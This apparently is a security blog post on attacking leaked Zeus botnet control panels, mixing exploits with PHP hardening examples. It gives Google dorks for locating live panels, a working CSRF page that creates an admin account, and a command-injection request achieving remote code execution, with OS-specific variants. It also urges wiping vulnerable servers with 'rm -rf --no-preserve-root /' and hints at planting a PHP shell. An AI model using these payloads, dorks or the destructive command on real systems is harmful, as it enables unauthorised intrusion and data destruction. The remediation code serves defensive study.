Thursday, June 1, 2023

Attacking Financial Malware Botnet Panels - Zeus

I played with leaked financial malware recently. When I saw that these panels are written in PHP, my first idea was to hack them. The results are the work of one evening, so please don't expect a full pentest report with all vulns found :-)

The following report is based on Zeus 2.0.8.9, which is old, but I believe a lot of Zeus clones (and C&C panels) depend on this code.

First things first, here are some Google dorks to find Zeus C&C server panel related stuff:
  • inurl:cp.php?m=login - this should be the login page of the control panel
  • inurl:_reports/files - these folders hold the stolen data; pretty funny when it gets indexed by Google
  • inurl:install/index.php - the installer should be deleted after setup, but I think this dork is useless by now.


Boring vulns found

Update: you can use the CSRF (the panel does not protect the user-management form with a token) to create a new user with admin privileges. The POC below posts the "new user" form into a hidden iframe; point the form action at the real panel instead of 127.0.0.1:

    <html>
    <head>
        <title></title>
    </head>
    <body>
        <pre>
    This is a CSRF POC to create a new admin user in Zeus admin panels.
    Username: user_1392719246 Password: admin1
    You might need to change the URL from 127.0.0.1.
    Redirecting in a hidden iframe in <span id="countdown">10</span> seconds.
        </pre>
        <iframe id="csrf-frame" name="csrf-frame" style="display: none;"></iframe>
        <form action="http://127.0.0.1/cp.php?m=sys_users&amp;new" id="csrf-form" method="post" name="csrf-form" target="csrf-frame">
            <input name="name" type="hidden" value="user_1392719246" />
            <input name="password" type="hidden" value="admin1" />
            <input name="status" type="hidden" value="1" />
            <input name="comment" type="hidden" value="PWND!" />
            <input name="r_botnet_bots" type="hidden" value="1" />
            <input name="r_botnet_scripts" type="hidden" value="1" />
            <input name="r_botnet_scripts_edit" type="hidden" value="1" />
            <input name="r_edit_bots" type="hidden" value="1" />
            <input name="r_reports_db" type="hidden" value="1" />
            <input name="r_reports_db_edit" type="hidden" value="1" />
            <input name="r_reports_files" type="hidden" value="1" />
            <input name="r_reports_files_edit" type="hidden" value="1" />
            <input name="r_reports_jn" type="hidden" value="1" />
            <input name="r_stats_main" type="hidden" value="1" />
            <input name="r_stats_main_reset" type="hidden" value="1" />
            <input name="r_stats_os" type="hidden" value="1" />
            <input name="r_system_info" type="hidden" value="1" />
            <input name="r_system_options" type="hidden" value="1" />
            <input name="r_system_user" type="hidden" value="1" />
            <input name="r_system_users" type="hidden" value="1" />
        </form>
        <script type="text/javascript">
            // Count down for 10 seconds, then submit the form into the hidden iframe
            window.onload = function () {
                var counter = 10;
                var interval = setInterval(function () {
                    counter--;
                    document.getElementById('countdown').innerHTML = counter;
                    if (counter == 0) {
                        redirect();
                        clearInterval(interval);
                    }
                }, 1000);
            };

            function redirect() {
                document.getElementById("csrf-form").submit();
            }
        </script>
    </body>
    </html>
  • MD5 password - the passwords stored in MySQL are plain, unsalted MD5 hashes. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5.
  • ClickJacking - really boring stuff
  • Remember me (MD5 cookies) - a very bad idea. The remember me function is implemented by storing the MD5 of the password and the MD5 of the username in a cookie. If I have XSS, I can get the MD5(password) as well, and since it is unsalted MD5 it can be cracked offline.
  • SQLi - string concatenation is used instead of parameterized queries, but the input goes through addslashes() and integers are always quoted. This means it can only be exploited in the special case of a multibyte connection charset like GBK/Big5 (the classic addslashes bypass), which is pretty unlikely.
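As an added example (not code from the Zeus panel), this is what fixing the three findings above looks like in PHP: bcrypt via password_hash() instead of bare MD5, a random single-use remember-me token stored hashed on the server instead of MD5(username)/MD5(password) in the cookie, and a per-session token that the user-management form must echo back so the CSRF POC above fails. The MySQL users table and the PHP session are replaced by in-memory arrays; that layout and the file name are assumptions made to keep the example self-contained.

```php
<?php
// Added example, not code from the Zeus panel: hardened replacements for the
// MD5 password storage, the MD5 remember-me cookie and the missing CSRF token.
// The MySQL users table is replaced by an in-memory array and the PHP session
// by a plain array; both are assumptions that keep the example self-contained.
// Run with: php auth_hardening.php

// Password storage: salted, slow bcrypt via password_hash() instead of md5().
function storeUser(array &$users, string $name, string $password): void
{
    $users[$name] = [
        'pw_hash'      => password_hash($password, PASSWORD_BCRYPT),
        'remember'     => null,  // sha256 of the current remember-me token
        'remember_exp' => 0,     // unix time after which that token is dead
    ];
}

function checkLogin(array $users, string $name, string $password): bool
{
    if (!isset($users[$name])) {
        return false;
    }
    return password_verify($password, $users[$name]['pw_hash']);
}

// Remember-me: a random, single-use token stored hashed on the server with an
// expiry. A cookie stolen through XSS gives the attacker a revocable token, not
// an unsalted md5($password) that can be cracked offline and replayed forever.
function issueRememberToken(array &$users, string $name, int $ttl = 30 * 86400): string
{
    $token = bin2hex(random_bytes(32));
    $users[$name]['remember']     = hash('sha256', $token);
    $users[$name]['remember_exp'] = time() + $ttl;
    // In a request handler the value would be sent with
    // setcookie('remember', $name . ':' . $token, ['expires' => time() + $ttl,
    //   'secure' => true, 'httponly' => true, 'samesite' => 'Strict']);
    return $name . ':' . $token;
}

// Returns the user name the cookie logs in, or null. The token is consumed on
// success, so the caller issues a fresh one and a replayed cookie fails.
function checkRememberCookie(array &$users, string $cookie): ?string
{
    $parts = explode(':', $cookie, 2);
    if (count($parts) !== 2 || !isset($users[$parts[0]])) {
        return null;
    }
    [$name, $token] = $parts;
    $u = &$users[$name];
    if ($u['remember'] === null || $u['remember_exp'] < time()
        || !hash_equals($u['remember'], hash('sha256', $token))) {
        return null;
    }
    $u['remember'] = null;
    return $name;
}

// CSRF: a per-session random token that every state-changing form (such as
// cp.php?m=sys_users&new) must echo back in a hidden field.
function csrfToken(array &$session): string
{
    if (!isset($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(16));
    }
    return $session['csrf'];
}

function csrfCheck(array $session, string $submitted): bool
{
    return isset($session['csrf']) && hash_equals($session['csrf'], $submitted);
}

// Walk-through with the credentials from the CSRF POC above.
$users   = [];
$session = [];
storeUser($users, 'user_1392719246', 'admin1');
printf("login ok:        %s\n", var_export(checkLogin($users, 'user_1392719246', 'admin1'), true));
printf("wrong password:  %s\n", var_export(checkLogin($users, 'user_1392719246', 'admin'), true));

$cookie = issueRememberToken($users, 'user_1392719246');
printf("cookie 1st use:  %s\n", var_export(checkRememberCookie($users, $cookie), true));
printf("cookie replayed: %s\n", var_export(checkRememberCookie($users, $cookie), true));

$token = csrfToken($session);
printf("csrf genuine:    %s\n", var_export(csrfCheck($session, $token), true));
printf("csrf forged:     %s\n", var_export(csrfCheck($session, 'PWND!'), true));
```

The second checkRememberCookie() call returns null because the first call consumed the token; a forged form that does not carry the session's token fails csrfCheck(), and hash_equals() keeps both comparisons constant-time.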

What's good news (for the C&C panel owners)


The following stuff looks good; at least some vulns were taken seriously:
  • The system directory is protected with .htaccess (deny from all).
  • gate.php - this is the "gate" between the bots and the server, so this PHP is always exposed to the Internet. Execution dies early if you don't know the key, but the key can be extracted from the bot binary of that specific botnet (how to do that is a topic for another post). With the key you can fill the database with garbage, but that's all I can think of right now.
  • Anti XSS: the following code is used almost everywhere:

        return htmlspecialchars(preg_replace('|[\x00-\x09\x0B\x0C\x0E-\x1F\x7F-\x9F]|u', ' ', $string), ENT_QUOTES, 'UTF-8');

    It replaces control characters with spaces and HTML-encodes <, >, &, " and ' for UTF-8 output, which is the right escaping for HTML text and quoted attributes (it would not be enough inside a script block or an unquoted attribute). My evil thought was to inject a malicious bot_id, but it looks like it has been filtered everywhere. Sad panda.

What's really bad news (for the C&C panel owners)


And the best vuln I was able to find: remote code execution through command injection (happy panda), but only for authenticated users (sad panda).

The vulnerable code is in system/fsarc.php:

    function fsarcCreate($archive, $files){
        ...
        $archive .= '.zip';
        // $files comes straight from the files[] POST parameter; each name is only
        // wrapped in double quotes, so a " inside a name breaks out into shell syntax
        $cli = 'zip -r -9 -q -S "'.$archive.'" "'.implode('" "', $files).'"';
        exec($cli, $e, $r);
    }

The exploit could not be simpler:

    POST /cp.php?m=reports_files&path= HTTP/1.1
    ...
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 60

    filesaction=1&files%5B%5D=files"||ping%20-n%2010%20127.0.0.1

The command line that reaches exec() is zip -r -9 -q -S "<archive>.zip" "files"||ping -n 10 127.0.0.1". I used || because the zip utility was not found on my Windows box, so the zip command fails and the shell runs the ping. You can try to replace || with && when attacking Windows (don't forget to URL encode it!), or replace || with ; when attacking Linux (and ping -n with ping -c, since -n is the Windows count flag). You can also chain this vulnerability with the CSRF one, but it is unlikely that you know both the control panel admin and the control panel URL. Or if this is the case, the admin should practice better OPSEC :)
Recommendation: pass each file name through escapeshellarg() next time (escapeshellcmd() on the whole command is the weaker option, as it still allows extra arguments to be injected).
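To make the difference concrete, here is an added example (not the Zeus panel's code) that puts the vulnerable fsarcCreate() pattern next to a hardened version and feeds both the payload from the request above. Both functions return the command line instead of calling exec(), so it is a dry run; the archive and file names are made up.

```php
<?php
// Added example, not the Zeus panel's code: the fsarcCreate() pattern from
// system/fsarc.php next to a hardened version. Both build the command line and
// return it instead of calling exec(), so the demo is a dry run that shows what
// the shell would receive. The archive and file names are made up.
// Run with: php fsarc_demo.php

// The original pattern: each name is only wrapped in double quotes, so a
// double quote inside a name ends the argument and the rest is shell syntax.
// The real function continues with exec($cli, $e, $r).
function fsarcCreateVulnerable(string $archive, array $files): string
{
    $archive .= '.zip';
    return 'zip -r -9 -q -S "' . $archive . '" "' . implode('" "', $files) . '"';
}

// Hardened: names must be plain file names (no directory part, no ".."), and
// every argument goes through escapeshellarg(), which single-quotes it and
// escapes embedded single quotes (on Windows it double-quotes and blanks out
// ", % and !), so the shell sees exactly one argument per file whatever
// characters it contains. escapeshellcmd() on the whole string is weaker: it
// escapes metacharacters but leaves spaces, so extra zip options could still be
// smuggled in.
function fsarcCreateHardened(string $archive, array $files): string
{
    $args = [];
    foreach ($files as $f) {
        if ($f === '' || $f === '.' || $f === '..' || $f !== basename($f)) {
            throw new InvalidArgumentException("refusing file name: $f");
        }
        $args[] = escapeshellarg($f);
    }
    return 'zip -r -9 -q -S ' . escapeshellarg($archive . '.zip') . ' ' . implode(' ', $args);
}

// Check used by the demo: does the command line contain a shell operator
// outside of quotes? Tracks single/double quote state character by character.
function hasUnquotedOperator(string $cli): bool
{
    $inSingle = $inDouble = false;
    $len = strlen($cli);
    for ($i = 0; $i < $len; $i++) {
        $c = $cli[$i];
        if ($c === "'" && !$inDouble) {
            $inSingle = !$inSingle;
        } elseif ($c === '"' && !$inSingle) {
            $inDouble = !$inDouble;
        } elseif (!$inSingle && !$inDouble && strpos('|&;', $c) !== false) {
            return true;
        }
    }
    return false;
}

// The payload from the request above, as PHP receives it in $_POST['files'].
$payload = 'files"||ping -n 10 127.0.0.1';

$vuln = fsarcCreateVulnerable('reports', ['legit.txt', $payload]);
printf("vulnerable: %s\n  unquoted operator: %s\n", $vuln, var_export(hasUnquotedOperator($vuln), true));

$safe = fsarcCreateHardened('reports', ['legit.txt', $payload]);
printf("hardened:   %s\n  unquoted operator: %s\n", $safe, var_export(hasUnquotedOperator($safe), true));

// Path traversal is rejected before any shell is involved.
try {
    fsarcCreateHardened('reports', ['../../system/config.php']);
} catch (InvalidArgumentException $e) {
    printf("traversal:  %s\n", $e->getMessage());
}
```

In the vulnerable line the double quote in the payload closes the argument and || is left bare for the shell; in the hardened line the whole payload sits inside one single-quoted argument, so zip is asked for a file that happens to be called files"||ping -n 10 127.0.0.1 and nothing else runs.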

Next time you find a vulnerable control panel with a weak password, just rm -rf --no-preserve-root / it ;-)

That's all folks!
Special greetz to Richard (XAMPP Apache service is running as SYSTEM ;-) )

Update: it looks like gate.php is worth investigating if you know the RC4 key. You can upload a PHP shell :)